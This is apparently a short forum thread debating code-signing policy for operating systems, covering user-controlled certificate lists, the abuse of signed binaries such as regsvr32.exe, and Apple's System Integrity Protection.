[derekp7]

There is a middle ground. Have the OS enforce only running, signed executables, but put the user in control of the certificate authority list. Then if you want Apple's style of security, just put their key in the list. If you want more freedom, add you own key and sign away.

[pilif]

of course, then you'll end up with regsvr32.exe which is signed by microsoft and still happily downloads and executes script code from remote servers.

Unfortunately, not even this approach will work. No. To be totally safe, you have to whitelist by digest of the exe and command-line arguments. Which basically means that you have to know the the OS works internally.

[acdha]

In general, I think that approach would need one other change to either prevent “core” resources (e.g. firmware, kernel, system binaries) from being modified or having a fail-safe way to reset those files back to a trusted base state. Otherwise it'll just hit the same problem where many users will approve any request described as necessary to run the free game/movies/porn/etc. and lose control of their computer.

This is basically what Apple shipped in OS X 10.11 where you can trust third-party developers but System Integrity Protection (https://support.apple.com/en-us/HT204899) tries to limit the damage that even getting root can cause.